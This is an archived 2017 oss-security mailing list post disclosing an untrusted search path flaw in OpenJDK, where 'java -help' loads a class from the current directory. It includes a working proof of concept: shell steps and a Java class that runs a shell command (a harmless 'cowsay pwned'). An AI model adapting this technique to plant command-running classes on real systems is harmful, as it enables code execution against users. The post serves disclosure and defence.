Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 13 Jun 2017 17:23:13 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: OpenJDK: java(1): untrusted search path

Running "java -help" can load code from a subdirectory of cwd:

    $ javac launcher_en.java
    $ mkdir -p sun/launcher/resources/
    $ mv launcher_en.class sun/launcher/resources/
    $ java -help
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||

This happens because:

* By default (i.e. when CLASSPATH env var was unset and neither -cp nor -jar 
was specified), java sets "." as the user class path:
https://docs.oracle.com/javase/8/docs/technotes/tools/findingclasses.html#userclass

* The help message is apparently supposed to be internationalized.

* The Java's localization machinery loads classes:
https://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.html


On Debian systems, jarwrapper (a binfmt-misc thing for running executable jar 
files) is affected. It contains the following code:

    if java -d32 2>&1 | grep "does not support" > /dev/null; then
    ...

On 32-bit systems, this causes java to print the help message.

-- 
Jakub Wilk

package sun.launcher.resources;
import java.util.*;
public class launcher_en extends ListResourceBundle {
    public Object[][] getContents() {
        ProcessBuilder pb = new ProcessBuilder("sh", "-c", "cowsay pwned >/dev/tty");
        try {
            pb.start();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        Runtime.getRuntime().exit(1);
        return null;
    }
}

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ